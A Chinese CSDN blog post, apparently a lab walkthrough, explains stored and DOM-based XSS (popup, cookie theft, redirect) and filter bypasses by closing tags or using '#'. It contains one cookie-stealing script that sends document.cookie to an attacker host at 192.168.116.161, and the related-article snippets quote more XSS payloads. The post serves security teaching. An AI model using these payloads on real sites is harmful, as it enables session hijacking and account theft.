DOM型XSS 和存储型XSS

最新推荐文章于 2023-06-27 14:41:12 发布
最新推荐文章于 2023-06-27 14:41:12 发布
阅读量352 收藏 1
点赞数
文章标签: xss javascript 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46429206/article/details/121705880
版权

存储型原理图及原理
弹窗:
在这里插入图片描述

原理:1、攻击者向服务器提交一段js代码
2、服务器保存js代码并将结果返回给攻击者
3、受害者访问服务器
4、服务器将js代码传给受害者,受害者电脑出现弹窗

Cookie:
在这里插入图片描述

原理:1、攻击者向服务器提交一段js代码
2、服务器保存js代码并将结果返回给攻击者
3、受害者访问服务器
4、服务器将js代码传给受害者
5、受害者电脑将cookie值发送给攻击者

重定向:
在这里插入图片描述

原理:1、攻击者向服务器提交一段js代码
2、服务器保存js代码并将结果返回给攻击者
3、受害者访问服务器
4、服务器将js代码传给受害者
5、受害者电脑自动跳转到攻击者指定的网页

DOM型 XSS

源码没有限制,在搜索框中修改值即可
弹窗:
在这里插入图片描述

Cookie:

<script>var img=document.createElement(‘img’);img.src=’http://192.168.116.161:88/log?+escape(document.cookie);</script>

在这里插入图片描述

重定向:

在这里插入图片描述
在这里插入图片描述


源码对script进行了过滤
在这里插入图片描述

因此我们需要提前闭合标签
弹窗:
在这里插入图片描述

Cookie:

在这里插入图片描述


源码对非默认语言全部默认为英语
在这里插入图片描述

这里我们需要用到#绕过,作用就是#后面的内容不提交给服务器。其余步骤与低级一样
在这里插入图片描述

weixin_46429206
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
存储XSSDOMXSS
qq_68233961的博客
08-30 1100
存储XSSDOMXSS
储存XSSDOMXSS的解析
weixin_44749329的博客
05-19 3576
储存XSSDOMXSS的解析 存储XSS漏洞 存储XSS漏洞和反射形成的原因是一样的,也在输入输出时造成的问题,不同的是存储XSS下可以将攻击者的脚本注入后台存储起来,结构更加持久的危害,因此存储XSS也称“永久XSS。 1.打开pikachu“Cross-Site Scripting—存储XSS” 2.在我是一个留言板里留个言随便输入一个东西,点击提交(submit)...
Discuz 前台回帖 存储 DOM XSS
qq_35420342的博客
04-29 321
产生原因:JS原生取ELEMENT中HTML内容的方法,会将服务端转义过的单双引号实体编码进行反转。代码分析:这里有payload: [align="onmouseover="alert(1)], 那么就从payload开始往回看漏洞是怎么产生的&lt;textarea name='message' id='e_textarea' class='pt' rows='15' tabindex='2'...
Discuz 全版本存储 DOM XSS
whatiwhere的博客
11-30 1913
实验目的 1.掌握XSS的原理及其利用方法 2.了解XSS的修复方法 实验内容 漏洞介绍 攻击者可以构造JS语句,通过XSS漏洞使管理员中招,获取管理员Cookie 影响范围 全版本 漏洞危害 上传脚本文件盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号; 利用xss漏洞上传脚本文件获得企业网站一定权限控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力; 盗窃企业重要...
渗透测试-xss的三种类讲解
lza20001103的博客
08-07 4122
渗透测试-xss的三种类讲解
DOMXSS1
08-08
这种攻击方式不同于传统的存储XSS和反射XSS,它不需要服务器端的参与,攻击者可以直接在客户端inject恶意脚本。 DOMXSS的攻击方式 攻击者可以通过多种方式inject恶意脚本到网页中,例如: 1. 通过...
Web应用安全:DOMXSS.pptx
06-18
反射XSS存储XSS都发生在服务器端,而DOMXSS主要发生在客户端。在反射XSS中,恶意代码作为参数包含在URL中,当用户点击链接时,这些参数被服务器处理并返回到页面,然后执行。存储XSS则更严重,因为它...
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
存储XSS与反射XSSDOMXSS不同,它不是通过URL参数或者DOM动态生成的,而是将恶意代码存储在了服务器上,比如用户评论、论坛帖子等地方。当其他用户访问这些含有恶意代码的页面时,浏览器会执行其中的脚本,...
XSS存储 网易云课堂
01-18
XSS存储XSS攻击的一种类,与反射DOMXSS不同,它主要涉及用户提交的数据被永久性地存储在服务器端,并在后续请求中被其他用户读取和执行。 在“网易云课堂微专业-WEB安全工程师”课程中,深入探讨了这种...
Catfish(鲶鱼) Blog V1.3.15存储 xss1
08-03
根据脚本执行的位置不同,XSS可以分为三种类:反射XSS存储XSS以及DOMXSS。本次讨论的是存储XSS,这类XSS的特点是恶意脚本被持久化地保存在服务器上,通过正常的网页请求即可触发。 ##### 2. 漏洞分析 ...
Lab: Stored DOM XSS存储DOM XSS
Zeker62的博客
08-25 587
内容: 本实验演示了博客评论功能中的存储 DOM 漏洞。为解决本实验,利用该漏洞调用alert()函数。 解决 发表包含以下向量的评论: <><img src=1 onerror=alert(1)> 为了防止XSS,该网站使用 JavaScriptreplace()函数对尖括号进行编码。但是,当第一个参数是字符串时,该函数仅替换第一次出现。我们通过在注释的开头简单地包含...
XSS漏洞简介、危害与分类及验证
最新发布
jennycisp的博客
06-27 7839
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
Web安全之一文看懂XSS
m0_60571990的博客
02-24 771
Web安全之一文看懂XSS
反射XSS存储XSSDOMXSS的简介及XSS常见payload构造及变形
bwxzdjn的博客
03-21 5135
用实验案例的形式记录学习三大常见的跨站脚本攻击:反射XSS存储XSSDOMXSS,借此来掌握XSS攻击的基础知识。还有几种payload的构造以及变形来绕过一些简单的过滤。
DOM-based XSS存储XSS、反射XSS有什么区别?
xysoul的专栏
05-26 1万+
http://www.zhihu.com/question/26628342 单单解释三者的区别,似乎有点单调。说到xss,就必须要提一提js,脱离了js去谈xss都是耍流氓! 1,)先来分析一下LZ说的DOM-based XSS。 一句话概括:DOM—based XSS漏洞是基于文档对象模Document Objeet Model,DOM)的一种漏洞。 如果楼主没有搞懂dom
反射XSS存储XSSDOMXSS到底有什么区别?????
热门推荐
qq_41734243的博客
05-14 1万+
被攻击者是单一 解析地方不同 存储时间不同 允许点的不同
反射XSS,存储XSSDomXSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
weixin_43858799的博客
04-22 3004
XSS: 反射XSS,存储XSSDomXSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一、跨站脚本漏洞(XSSXSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发生在web前端的漏洞,主要危害前端用户 XSS可以通过进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器自身漏洞对主机进行远程控制等 攻击流程图: 危害:存储>反射>D...
关于DOMXSS的深入解析(收藏)
告白的博客
01-11 1万+
很多初次接触xss的小白,尽管知道xss的三种分类,但是在DOMxss还是存在理解上的不足,这篇文章希望能帮助到更好的理解DOMxss
DOMXSS
qq_45300786的博客
08-20 4135
可以通过document来获取有些信息。
存储XSS攻击:成因、挖掘与防御策略
存储XSS是一种持续存在的威胁,需要开发人员持续关注并采取相应的安全措施来防止和减轻其带来的风险。同时,随着安全技术的进步,虽然XSS攻击容易被发现和防御,但攻击者也会不断寻找新的漏洞利用方式,因此防御...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值